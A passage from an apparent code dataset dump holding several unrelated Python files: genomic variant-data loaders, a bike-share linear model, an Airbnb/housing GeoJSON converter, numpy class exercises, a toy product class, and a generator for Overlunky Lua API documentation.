sep='\\t', index=False)\n\n\t# load read fragments and their qualities\n\t_, fragments, qualities = read_fragments(fragments_path)\n\n\treturn df, fragments, qualities\n\t\n\ndef 
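_example_mask_to_bed(df, fragments):\n\t''' \n\tIllustrative sketch only, not called elsewhere: keeps just the fragment\n\t\tmatrix columns whose sites fall inside the GIAB high-confidence .bed\n\t\tregions, using the in_bed column produced by load_full_data.\n\t'''\n\tkeep = df.in_bed.astype(int).to_numpy() == 1\n\treturn fragments[:, keep]\n\n\ndef 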
load_longshot_data(fragments_path, longshot_vcf_path, \n\t\t\t\t\t\treturn_vcf=False):\n\t''' \n\tLoad data from fragments.txt & 2.0.realigned_genotypes.vcf files\n\tgenerated by Longshot.\n\n\tArgs:\n\t\tfragments_path: path to fragments.txt\n\t\tlongshot_vcf_path: path to 2.0.realigned_genotypes.vcf\n\t\treturn_vcf: also returns longshot_vcf_path data dict as read\n\t\t\tby scikit-allel when True\n\n\tReturns:\n\t\tsite_data, fragments, qualities, vcf_dict(opt)\n\n\t\tsite_data: DataFrame with info for all sites HMM predicts are\n\t\t\theterozygous\n\t\tfragments: fragments matrix as returned by read_fragments; no site\n\t\t\tmasking is applied here\n\t\tqualities: qualities matrix as returned by read_fragments; no site\n\t\t\tmasking is applied here\n\t\tvcf_dict: longshot_vcf_path data dict as read by scikit-allel\n\t'''\n\t# load vcf from longshot run\n\tls_callset = allel.read_vcf(longshot_vcf_path)\n\n\t# find where longshot hmm predicts heterozygous\n\tls_01 = np.all(np.equal(ls_callset['calldata/GT'], [0,1]), axis=2).T[0]\n\tls_10 = np.all(np.equal(ls_callset['calldata/GT'], [1,0]), axis=2).T[0]\n\tls_hetero = ls_01 | ls_10\n\n\tdf = pd.DataFrame(\n\t\tnp.array((\n\t\t\trange(ls_callset['variants/POS'].shape[0]),\n\t\t\tls_callset['variants/CHROM'],\n\t\t\tls_callset['variants/POS'],\n\t\t\tls_hetero.astype(int)\n\t\t)).T,\n\t\tcolumns=['site_ind', 'chrom', 'pos', 'hmm_pred_hetero']\n\t)\n\n\t# load read fragments and their qualities\n\t_, fragments, qualities = read_fragments(fragments_path)\n\n\tif return_vcf:\n\t\treturn df, fragments, qualities, ls_callset\n\telse:\n\t\treturn df, fragments, qualities\n\n\nif __name__ == '__main__':\n\tfragments_path='data/fragments/chr20_1-1M/fragments.txt'\n\tlongshot_vcf_path='data/fragments/chr20_1-1M/2.0.realigned_genotypes.vcf'\n\tground_truth_vcf_path='data/GIAB/HG002_GRCh38_1_22_v4.1_draft_benchmark.vcf'\n\tgiab_bed_path='data/GIAB/HG002_GRCh38_1_22_v4.1_draft_benchmark.bed'\n\tsite_data_save_path='data/preprocessed/1M_site_data.tsv'\n\n\t# df, fragments, qualities, ff, _ = load_data(\n\t# \tfragments_path, \n\t# \tlongshot_vcf_path, \n\t# \tground_truth_vcf_path,\n\t# \tgiab_bed_path, \n\t# \tsave_path=site_data_save_path)\n\n\t# df, fragments, qualities = load_longshot_data(fragments_path, longshot_vcf_path)\n\n\tdf, fragments, qualities = load_full_data(fragments_path, longshot_vcf_path, ground_truth_vcf_path,\n\t\t\t\tgiab_bed_path)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"515299791","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 08 13:56:44 2015\n\n@author: Steve Elston\n\nCode to create a simple linear model for testing purposes.\n\"\"\"\n\ndef azureml_main(BikeShare):\n from sklearn import linear_model\n import pandas as pd\n \n cols = ['temp', 'hum', 'xformWorkHr', 'dayCount', 'mnth']\n # .as_matrix() was removed from pandas; .values yields the same ndarray\n X = BikeShare[cols].values\n Y = BikeShare['cnt'].values\n ## Compute the linear model.\n clf = linear_model.LinearRegression()\n bike_lm = clf.fit(X, Y)\n \n coef_names = ['intercept'] + cols\n \n ## Build a DataFrame to output the coefficients \n lm_co = []\n lm_co.append(bike_lm.intercept_)\n for val in list(bike_lm.coef_): lm_co.append(val)\n \n coefs = pd.DataFrame({'coef_names' : coef_names,\n 'coefs' : lm_co}\n )\n \n return 
coefs\n","sub_path":"Python/linearmodel.py","file_name":"linearmodel.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291759504","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 6 13:44:10 2019\n\n@author: romain\n\"\"\"\n\nimport pandas as pd\nimport geopandas as gpd\n\nif __name__ == '__main__':\n\n# df = pd.read_csv('paris_rpls_2017.csv', sep=',', header='infer',\n# usecols=['longitude','latitude'])\n#\n# gdf = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.longitude, df.latitude))\n# gdf.drop(columns=['longitude','latitude'], inplace=True)\n# gdf.to_file(\"static/donneesgeos/rpls.geojson\", driver='GeoJSON')\n\n# df = pd.read_csv(\"airbnb.csv\", sep=',', header='infer',\n# usecols=['latitude','longitude'],\n# dtype={'longitude':'float', 'latitude':'float'})\n# gdf = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.longitude, df.latitude))\n# gdf.drop(columns=['longitude','latitude'], inplace=True)\n# gdf.to_file(\"static/donneesgeos/airbnb.geojson\", driver='GeoJSON')\n \n# results = pd.read_csv('results.csv', header='infer', index_col='id_bnb',\n# dtype={'id_rpls':'int', 'distance':'float'})\n \n# results = results.loc[results.distance < 5]\n# gdf = gpd.GeoDataFrame(results)\n\n#-----------------------------------------------------------------------------#\n# Create croisement.geojson for airbnb entries with at least one score > seuil #\n#-----------------------------------------------------------------------------#\n keep_columns = ['id_bnb']\n for i in range(250):\n keep_columns.append('id_rpls{}'.format(i))\n keep_columns.append('score{}'.format(i))\n dtype = {key:'int64' for key in keep_columns}\n \n df_results = pd.read_csv('results_rd155_nb250.csv', header='infer'\n , usecols=keep_columns,\n index_col='id_bnb'\n )\n \n df_results.index.rename('id_bnb', inplace=True)\n\n df_bnb = pd.read_csv(\"airbnb.csv\", sep=',', header='infer',\n usecols=['latitude','longitude'],\n dtype={'longitude':'float', 'latitude':'float'})\n\n # Build boolean columns for the condition score > seuil\n seuil = 0.8\n condition_colonne = df_results['score0'] > seuil\n df_results.loc[:,'seuil0'] = condition_colonne\n for i in range(1,250):\n colonne_inter = df_results['score'+str(i)] > seuil\n df_results.loc[:, 'seuil'+str(i)] = colonne_inter # per-column flag for score{i} > seuil\n condition_colonne = condition_colonne + colonne_inter\n\n df_results = pd.concat([df_results,df_bnb], ignore_index=False, sort=False, axis=1)\n df_results.loc[:, 'seuil_total'] = condition_colonne\n print(df_results.shape)\n# df_results = df_results.loc[df_results.seuil_total] \n# print(df_results.shape)\n\n # Identify and store the id_rpls whose score is above the threshold\n id_sup_seuil = []\n for i in range(250):\n id_sup_seuil.append(\n df_results.loc[\n df_results.loc[:,'seuil{}'.format(i)]\n ,'id_rpls{}'.format(i)\n ].reindex(index=range(df_results.shape[0])))\n \n df_results = df_results.loc[:,['latitude','longitude']]\n \n # Add an 'id_bnb' column so that id_bnb shows up in the geojson properties\n df_results['id_bnb']=df_results.index\n\n for i in range(250):\n df_results = pd.concat([df_results,id_sup_seuil[i]], ignore_index=False\n , sort=False, axis=1)\n\n df_results = df_results.loc[df_results.isna().sum(axis=1) != 250]\n print(df_results.head())\n print(df_results.shape)\n \n gdf = gpd.GeoDataFrame(df_results, geometry=gpd.points_from_xy(df_results.longitude, df_results.latitude))\n 
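# the raw lon/lat columns are redundant once the geometry column holds the points\n 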
gdf.drop(columns=['longitude','latitude'], inplace=True)\n\n gdf.to_file(\"static/donneesgeos/croisementBis3.geojson\", driver='GeoJSON')\n\n#------------------------------------------------------------------------------#\n#----------------------------- Create coord_rpls ------------------------------#\n#------------------------------------------------------------------------------#\n\"\"\"\ndf = pd.read_csv('paris_rpls_2017.csv', sep=',', header='infer',\n usecols=['longitude','latitude'])\n\ndf.to_json('static/donneesgeos/coord_rpls.json')\n\"\"\"","sub_path":"po_oresys/backend_manipulation/csv_to_geojson.py","file_name":"csv_to_geojson.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248717217","text":"# %%\r\n# Find the largest integer less than or equal to x1/x2 where x1 = all integers 1-10 & x2 = 1.3:\r\nimport numpy as np\r\n\r\nx1_array = [1,2,3,4,5,6,7,8,9,10]\r\ndiv_array = np.divide(x1_array, 1.3)\r\ndiv_array\r\n\r\n\r\n# %%\r\n# Step 1: set x1\r\n## Different approach: x1 = np.arange(1,11)\r\nx1 = np.array(range(1,11)) \r\n\r\n# Step 2: set x2\r\nx2 = 1.3\r\n\r\n# Step 3\r\nx3 = x1//x2\r\nnp.max(x3)\r\n\r\n# np.floor(x1/x2)\r\n## np.max(x3)\r\n# %%\r\n# Conditional Statement demonstration:\r\nhunger = 2.9\r\n\r\nif 8 <= hunger <= 10:\r\n print(\"Eat a meal!\")\r\nelif 3 <= hunger < 8:\r\n print(\"Eat a snack!\")\r\nelse:\r\n print(\"Remember to hydrate.\")\r\n\r\n# For Loop demonstration:\r\nhunger_list = [1,6,3,7,8,4,2,9,10]\r\n\r\nfor i in hunger_list:\r\n if 8 <= i <= 10:\r\n print(\"Eat a meal!\")\r\n elif 3 <= i < 8:\r\n print(\"Eat a snack!\")\r\n else:\r\n print(\"Remember to hydrate.\")\r\n\r\n# List comprehension \r\nhunger_list = [1,6,3,7,8,4,2,9,10]\r\n\r\nnew_hunger_list = [i for i in hunger_list if i >= 3]\r\n\r\nprint(np.round(np.mean(new_hunger_list), 2))\r\n\r\n\r\n# %%\r\n","sub_path":"Notes/23.09.py","file_name":"23.09.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344622","text":"\"\"\"\nThis is the file containing the class Acme\n\"\"\"\nfrom random import randint\n\n\nclass Product():\n def __init__(\n self,\n name,\n price=10,\n weight=20,\n flammibility=0.5,\n identifier=None\n ):\n\n self.name = name\n self.price = price\n self.weight = weight\n self.flammibility = flammibility\n # draw a fresh id per instance; a randint() default argument would be\n # evaluated only once, when the def statement runs\n self.identifier = identifier if identifier is not None else randint(1000000, 9999999)\n\n def stealability(self):\n val_stealish = self.price / self.weight\n if val_stealish < 0.5:\n return print('Not so stealable.')\n elif val_stealish >= 0.5 and val_stealish < 1.0:\n return print('Kinda stealable...')\n else:\n return print('Very Stealable!!')\n\n def explode(self):\n exp_factor = self.flammibility * self.weight\n if exp_factor < 10:\n return print('...fizzle')\n elif exp_factor >= 10 and exp_factor < 50:\n return print('...boom!')\n else:\n return print('..BABOOM!!!')\n\n\nclass BoxingGlove(Product):\n def __init__(\n self,\n name,\n price=10,\n weight=10,\n flamibility=0.5,\n identifier=None\n ):\n\n self.name = name\n self.price = price\n self.weight = weight\n self.flammibility = flamibility\n self.identifier = identifier if identifier is not None else randint(1000000, 9999999)\n\n def explode(self):\n return print(\"... 
It's a glove.\")\n\n def punch(self):\n if self.weight < 5:\n return print('That tickles.')\n elif self.weight >= 5 and self.weight < 15:\n return print('Hey, that hurt!')\n else:\n return print(\"OUCH!!\")\n","sub_path":"SC/acme.py","file_name":"acme.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113312795","text":"import re\n\n# redirect stdout to script-api.md\nimport sys\n\nsys.stdout = open(\"script-api.md\", \"w\")\n\nheader_files = [\n \"../src/game_api/math.hpp\",\n \"../src/game_api/rpc.hpp\",\n \"../src/game_api/spawn_api.hpp\",\n \"../src/game_api/script.hpp\",\n \"../src/game_api/color.hpp\",\n \"../src/game_api/entity.hpp\",\n \"../src/game_api/movable.hpp\",\n \"../src/game_api/game_manager.hpp\",\n \"../src/game_api/state.hpp\",\n \"../src/game_api/state_structs.hpp\",\n \"../src/game_api/prng.hpp\",\n \"../src/game_api/entities_floors.hpp\",\n \"../src/game_api/entities_activefloors.hpp\",\n \"../src/game_api/entities_mounts.hpp\",\n \"../src/game_api/entities_monsters.hpp\",\n \"../src/game_api/entities_chars.hpp\",\n \"../src/game_api/entities_items.hpp\",\n \"../src/game_api/entities_fx.hpp\",\n \"../src/game_api/entities_liquids.hpp\",\n \"../src/game_api/sound_manager.hpp\",\n \"../src/game_api/render_api.hpp\",\n \"../src/game_api/particles.hpp\",\n \"../src/game_api/savedata.hpp\",\n \"../src/game_api/level_api.hpp\",\n \"../src/game_api/level_api_types.hpp\",\n \"../src/game_api/items.hpp\",\n \"../src/game_api/screen.hpp\",\n \"../src/game_api/screen_arena.hpp\",\n \"../src/game_api/online.hpp\",\n \"../src/game_api/script/usertypes/level_lua.hpp\",\n \"../src/game_api/script/usertypes/gui_lua.hpp\",\n \"../src/game_api/script/usertypes/vanilla_render_lua.hpp\",\n \"../src/game_api/script/usertypes/save_context.hpp\",\n \"../src/game_api/script/usertypes/hitbox_lua.hpp\",\n]\napi_files = [\n \"../src/game_api/script/script_impl.cpp\",\n \"../src/game_api/script/script_impl.hpp\",\n \"../src/game_api/script/lua_vm.cpp\",\n \"../src/game_api/script/lua_vm.hpp\",\n \"../src/game_api/script/lua_backend.cpp\",\n \"../src/game_api/script/lua_backend.hpp\",\n \"../src/game_api/script/usertypes/save_context.cpp\",\n \"../src/game_api/script/usertypes/state_lua.cpp\",\n \"../src/game_api/script/usertypes/prng_lua.cpp\",\n \"../src/game_api/script/usertypes/entity_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_chars_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_floors_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_activefloors_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_mounts_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_monsters_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_items_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_fx_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_liquids_lua.cpp\",\n \"../src/game_api/script/usertypes/particles_lua.cpp\",\n \"../src/game_api/script/usertypes/level_lua.cpp\",\n \"../src/game_api/script/usertypes/sound_lua.cpp\",\n \"../src/game_api/script/usertypes/player_lua.cpp\",\n \"../src/game_api/script/usertypes/gui_lua.cpp\",\n \"../src/game_api/script/usertypes/gui_lua.hpp\",\n \"../src/game_api/script/usertypes/vanilla_render_lua.cpp\",\n \"../src/game_api/script/usertypes/vanilla_render_lua.hpp\",\n \"../src/game_api/script/usertypes/drops_lua.cpp\",\n \"../src/game_api/script/usertypes/texture_lua.cpp\",\n 
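# the generator scans these sources for lua assignments, usertypes and named tables\n 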
\"../src/game_api/script/usertypes/flags_lua.cpp\",\n \"../src/game_api/script/usertypes/char_state_lua.cpp\",\n \"../src/game_api/script/usertypes/hitbox_lua.cpp\",\n \"../src/game_api/script/usertypes/screen_lua.cpp\",\n \"../src/game_api/script/usertypes/screen_arena_lua.cpp\",\n]\nrpc = []\nclasses = []\nevents = []\nfuncs = []\ntypes = []\nknown_casts = []\naliases = []\nlualibs = []\nenums = []\nreplace = {\n \"uint8_t\": \"int\",\n \"uint16_t\": \"int\",\n \"uint32_t\": \"int\",\n \"uint64_t\": \"int\",\n \"int8_t\": \"int\",\n \"int16_t\": \"int\",\n \"int32_t\": \"int\",\n \"int64_t\": \"int\",\n \"ImU32\": \"int\",\n \"vector\": \"array\",\n \"unordered_map\": \"map\",\n \"const char*\": \"string\",\n \"wstring\": \"string\",\n \"u16string\": \"string\",\n \"pair\": \"tuple\",\n \"std::\": \"\",\n \"sol::\": \"\",\n \"void\": \"\",\n \"constexpr\": \"\",\n \"static\": \"\",\n \"variadic_args va\": \"int, int...\",\n}\ncomment = []\nnot_functions = [\n \"players\",\n \"state\",\n \"game_manager\",\n \"online\",\n \"savegame\",\n \"options\",\n \"meta\",\n \"prng\",\n]\nskip = False\n\n\ndef getfunc(name):\n for func in funcs:\n if func[\"name\"] == name:\n return func\n return False\n\n\ndef rpcfunc(name):\n ret = []\n for func in rpc:\n if func[\"name\"] == name:\n ret.append(func)\n return ret\n\n\ndef replace_all(text, dic):\n for i, j in dic.items():\n pos = text.find(i)\n br2 = text.find('`', pos + len(i))\n br1 = text.rfind('`', 0, pos)\n if pos > 0 and br1 >= 0 and br2 > 0:\n continue\n text = text.replace(i, j)\n return text\n\n\ndef print_af(lf, af):\n if lf[\"comment\"] and lf[\"comment\"][0] == \"NoDoc\":\n return\n ret = replace_all(af[\"return\"], replace) or \"nil\"\n name = lf[\"name\"]\n param = replace_all(af[\"param\"], replace)\n fun = f\"{ret} {name}({param})\".strip()\n search_link = \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + name\n print(f\"### [`{name}`]({search_link})\")\n print(f\"`{fun}`
\")\n for com in lf[\"comment\"]:\n print(com)\n\n\nfor file in header_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n skip = 0\n for line in data:\n line = line.replace(\"*\", \"\")\n skip += line.count(\"{\") - line.count(\"}\")\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n m = re.search(r\"\\s*(.*)\\s+([^\\(]*)\\(([^\\)]*)\", line)\n if m:\n if skip == 0 or file.endswith(\"script.hpp\"):\n rpc.append(\n {\n \"return\": m.group(1),\n \"name\": m.group(2),\n \"param\": m.group(3),\n \"comment\": comment,\n }\n )\n else:\n comment = []\n\nfor file in header_files:\n if file.endswith(\"script.hpp\"):\n continue\n data = open(file, \"r\").read().split(\"\\n\")\n brackets_depth = 0\n in_union = False\n in_anonymous_struct = False\n class_name = None\n comment = []\n member_funs = {}\n member_vars = []\n for line in data:\n line = replace_all(line, replace)\n line = line.replace(\"*\", \"\")\n if not class_name and (\"struct\" in line or \"class\" in line):\n m = re.match(r\"(struct|class)\\s+(\\S+)\", line)\n if m:\n class_name = m[2]\n elif class_name:\n prev_brackets_depth = brackets_depth\n brackets_depth += line.count(\"{\") - line.count(\"}\")\n\n if brackets_depth == 1:\n if line.strip() == \"union\":\n in_union = True\n if brackets_depth == 2 and in_union:\n if line.strip() == \"struct\":\n in_anonymous_struct = True\n\n if brackets_depth < prev_brackets_depth:\n if brackets_depth == 2:\n in_anonymous_struct = False\n if brackets_depth == 1:\n in_union = False\n\n if (\n brackets_depth == 1\n or (brackets_depth == 2 and in_union)\n or (brackets_depth == 3 and in_anonymous_struct)\n ):\n m = re.search(r\"/// ?(.*)$\", line)\n if m:\n comment.append(m[1])\n else:\n m = re.search(\n r\"^\\s*:.*$\", line\n ) # skip lines that start with a colon (constructor parameter initialization)\n if m:\n continue\n\n m = re.search(r\"\\s*(virtual\\s)?(.*)\\s+([^\\(]*)\\(([^\\)]*)\", line)\n if m:\n name = m[3]\n # move ctor is useless for Lua\n is_move_ctr = re.fullmatch(fr\"\\s*{name}\\s*&&[^,]*\", m[4]) and not m[2]\n if not is_move_ctr:\n if name not in member_funs:\n member_funs[name] = []\n member_funs[name].append(\n {\n \"return\": m[2],\n \"name\": m[3],\n \"param\": m[4],\n \"comment\": comment,\n }\n )\n comment = []\n\n m = re.search(\n r\"\\s*([^\\;\\{]*)\\s+([^\\;^\\{}]*)\\s*(\\{[^\\}]*\\})?\\;\", line\n )\n if m:\n member_vars.append(\n {\"type\": m[1], \"name\": m[2], \"comment\": comment}\n )\n comment = []\n elif brackets_depth == 0:\n classes.append(\n {\n \"name\": class_name,\n \"member_funs\": member_funs,\n \"member_vars\": member_vars,\n }\n )\n class_name = None\n comment = []\n member_funs = {}\n member_vars = []\n\nfor file in api_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line = line.replace(\"*\", \"\")\n m = re.search(r'lua\\[[\\'\"]([^\\'\"]*)[\\'\"]\\];', line)\n if m:\n events.append({\"name\": m.group(1), \"comment\": comment})\n else:\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n else:\n comment = []\n\nfor file in api_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line = line.replace(\"*\", \"\")\n a = re.search(r'lua\\[[\\'\"]([^\\'\"]*)[\\'\"]\\]\\s+=\\s+(.*);', line)\n b = re.search(r'lua\\[[\\'\"]([^\\'\"]*)[\\'\"]\\]\\s+=\\s+(.*)$', line)\n if a and not a.group(1).startswith(\"__\"):\n if not getfunc(a.group(1)):\n funcs.append(\n {\"name\": a.group(1), \"cpp\": 
a.group(2), \"comment\": comment}\n )\n comment = []\n elif b and not b.group(1).startswith(\"__\"):\n if not getfunc(b.group(1)):\n funcs.append(\n {\"name\": b.group(1), \"cpp\": b.group(2), \"comment\": comment}\n )\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.findall(r'new_usertype\\<([^\\>]*?)\\>\\s*\\(\\s*\"([^\"]*)\",(.*?)\\);', data)\n for type in m:\n cpp_type = type[0]\n name = type[1]\n attr = type[2]\n base = \"\"\n bm = re.search(r\"sol::bases<([^\\]]*)>\", attr)\n if bm:\n base = bm.group(1)\n attr = attr.replace('\",', \",\")\n attr = attr.split('\"')\n vars = []\n\n underlying_cpp_type = next(\n (item for item in classes if item[\"name\"] == cpp_type), dict()\n )\n if \"member_funs\" not in underlying_cpp_type:\n raise RuntimeError(\n \"No member_funs found. Did you forget to include a header file at the top of the generate script?\"\n )\n\n for var in attr:\n if not var:\n continue\n var = var.split(\",\")\n if var[0] == \"sol::base_classes\" or var[0] == \"sol::no_constructor\":\n continue\n if \"table_of\" in var[1]:\n var[1] = var[1].replace(\"table_of(\", \"\") + \"[]\"\n if var[1].startswith(\"sol::readonly\"):\n var[1] = var[1].replace(\"sol::readonly(\", \"\")\n var[1] = var[1][:-1]\n if var[1].startswith(\"std::move\"):\n var[1] = var[1].replace(\"std::move(\", \"\")\n var[1] = var[1][:-1]\n\n var_name = var[0]\n cpp = var[1]\n cpp_name = cpp[cpp.find(\"::\") + 2 :] if cpp.find(\"::\") >= 0 else cpp\n\n if var[0].startswith(\"sol::constructors\"):\n for fun in underlying_cpp_type[\"member_funs\"][cpp_type]:\n param = fun[\"param\"]\n sig = f\"{cpp_type}({param})\"\n vars.append(\n {\n \"name\": cpp_type,\n \"type\": \"\",\n \"signature\": sig,\n \"comment\": fun[\"comment\"],\n }\n )\n elif cpp_name in underlying_cpp_type[\"member_funs\"]:\n for fun in underlying_cpp_type[\"member_funs\"][cpp_name]:\n ret = fun[\"return\"]\n param = fun[\"param\"]\n sig = f\"{ret} {var_name}({param})\"\n vars.append(\n {\n \"name\": var_name,\n \"type\": cpp,\n \"signature\": sig,\n \"comment\": fun[\"comment\"],\n }\n )\n else:\n underlying_cpp_var = next(\n (\n item\n for item in underlying_cpp_type[\"member_vars\"]\n if item[\"name\"] == cpp_name\n ),\n dict(),\n )\n if underlying_cpp_var:\n type = underlying_cpp_var[\"type\"]\n sig = f\"{type} {var_name}\"\n vars.append(\n {\n \"name\": var_name,\n \"type\": cpp,\n \"signature\": sig,\n \"comment\": underlying_cpp_var[\"comment\"],\n }\n )\n else:\n vars.append({\"name\": var_name, \"type\": cpp})\n types.append({\"name\": name, \"vars\": vars, \"base\": base})\n\nfor file in api_files:\n with open(file) as fp:\n line = fp.readline()\n while line:\n m = re.search(r'lua\\[\"Entity\"\\]\\[\"(as_.*)\"\\]', line)\n if m != None:\n known_casts.append(m.group(1))\n line = fp.readline()\nknown_casts.sort()\n\nfor file in api_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line = line.replace(\"*\", \"\")\n m = re.findall(r\"new_usertype\\<(.*?)\\>\", line)\n if m:\n type = m[0]\n type_to_mod = next((item for item in types if item[\"name\"] == type), dict())\n if type_to_mod:\n type_to_mod[\"comment\"] = comment\n comment = []\n if line == \"\":\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = 
data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\"\\/\\/,([^\\)]*)', data)\n for type in m:\n name = type[0]\n attr = type[1]\n attr = attr.replace(\"//\", \"\")\n attr = attr.replace('\",', \",\")\n attr = attr.split('\"')\n vars = []\n for var in attr:\n if not var:\n continue\n var = var.split(\",\")\n var[1] = var[1].replace(\"__\", \" \")\n var[1] = var[1].replace(\"\\\\[\", \"(\")\n var[1] = var[1].replace(\"\\\\]\", \")\")\n vars.append({\"name\": var[0], \"type\": var[1]})\n enums.append({\"name\": name, \"vars\": vars})\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\",([^\\)]*)', data)\n for type in m:\n name = type[0]\n attr = type[1]\n attr = attr.replace('\",', \",\")\n attr = attr.split('\"')\n vars = []\n for var in attr:\n if not var:\n continue\n var = var.split(\",\")\n vars.append({\"name\": var[0], \"type\": var[1]})\n enums.append({\"name\": name, \"vars\": vars})\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \" \")\n m = re.findall(r\"/\\*(.*?)\\*/\", data)\n for extended_enum_info in m:\n extended_enum_info = extended_enum_info.strip()\n enum = extended_enum_info[: extended_enum_info.find(\" \")]\n enum_to_mod = next((item for item in enums if item[\"name\"] == enum), dict())\n current_var_to_mod = dict()\n if enum_to_mod:\n sub_matches = re.findall(r\"\\/\\/\\s*([^\\/\\/]+)\", extended_enum_info.strip())\n collected_docs = \"\"\n for sub_match in sub_matches:\n var_name = sub_match.strip()\n var_to_mod = next(\n (item for item in enum_to_mod[\"vars\"] if item[\"name\"] == var_name),\n dict(),\n )\n if var_to_mod:\n if current_var_to_mod:\n current_var_to_mod[\"docs\"] = collected_docs\n current_var_to_mod = var_to_mod\n collected_docs = \"\"\n else:\n collected_docs += \"\\\\\\n\" + var_name\n if current_var_to_mod:\n current_var_to_mod[\"docs\"] = collected_docs\n\nfor file in api_files:\n comment = []\n name_next = False\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line_clean = line.replace(\" \", \"\")\n a = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\"\\/\\/,([^\\)]*)', line_clean)\n b = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\",([^\\)]*)', line_clean)\n c = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\"\\)', line_clean)\n m = a or b or ([c] if c else [])\n if m or name_next:\n enum = m[0][0] if m else line.strip('\", ')\n enum_to_mod = next((item for item in enums if item[\"name\"] == enum), dict())\n if enum_to_mod:\n enum_to_mod[\"comment\"] = comment\n comment = []\n name_next = False\n elif \"create_named_table\" in line:\n name_next = True\n else:\n name_next = False\n if line == \"\":\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.search(r\"open_libraries\\s*\\(([^\\)]*)\\)\", data)\n if m:\n libs = m.group(1).split(\",\")\n for lib in libs:\n lualibs.append(lib.replace(\"sol::lib::\", \"\"))\n\ndata = open(\"../src/game_api/aliases.hpp\", \"r\").read().split(\"\\n\")\nfor line in data:\n if not line.endswith(\"NoAlias\"):\n m = re.search(r\"using\\s*(\\S*)\\s*=\\s*(\\S*)\", line)\n if m:\n name = m.group(1)\n type = replace_all(m.group(2), replace)\n aliases.append({\"name\": name, 
\"type\": type})\n\nprint(\"# Overlunky Lua API\")\nprint(\n \"- Everything here is still changing, don't be sad if your scripts break next week!\"\n)\nprint(\n \"- This doc doesn't have a lot of examples, that's why we have [examples/](https://github.com/spelunky-fyi/overlunky/tree/main/examples).\"\n)\nprint(\n \"- This doc and the examples are written for a person who already knows [how to program in Lua](http://lua-users.org/wiki/TutorialDirectory).\"\n)\nprint(\n \"- This doc is up to date for the [WHIP build](https://github.com/spelunky-fyi/overlunky/releases/tag/whip). If you're using an official release from the past, you might find some things here don't work.\"\n)\nprint(\n \"- You can find changes to and earlier versions of this doc [here](https://github.com/spelunky-fyi/overlunky/commits/main/docs/script-api.md).\"\n)\nprint(\n \"- Click on the names of things to search for examples on how to use that function or variable.\"\n)\n\nprint(\"## Lua libraries\")\nprint(\n \"The following Lua libraries and their functions are available. You can read more about them in the [Lua documentation](https://www.lua.org/manual/5.4/manual.html#6).\"\n)\nfor lib in lualibs:\n print(\"### `\" + lib + \"`\")\nprint(\"### `json`\")\nprint(\n \"\"\"To save data in your mod it makes a lot of sense to use `json` to encode a table into a string and decode strings to table. For example this code that saves table and loads it back:\n```Lua\nlocal some_mod_data_that_should_be_saved = {{\n kills = 0,\n unlocked = false\n}}\nset_callback(function(save_ctx)\n local save_data_str = json.encode(some_mod_data_that_should_be_saved)\n save_ctx:save(save_data_str)\nend, ON.SAVE)\n\nset_callback(function(load_ctx)\n local load_data_str = load_ctx:load()\n if load_data_str ~= \"\" then\n some_mod_data_that_should_be_saved = json.decode(load_data_str)\n end\nend, ON.LOAD)\n```\"\"\"\n)\nprint(\"### `inspect`\")\nprint(\n \"\"\"This module is a great substitute for `tostring` because it can convert any type to a string and thus helps a lot with debugging. Use for example like this:\n```Lua\nlocal look_ma_no_tostring = {\n number = 15,\n nested_table = {\n array = {\n 1,\n 2,\n 4\n }\n 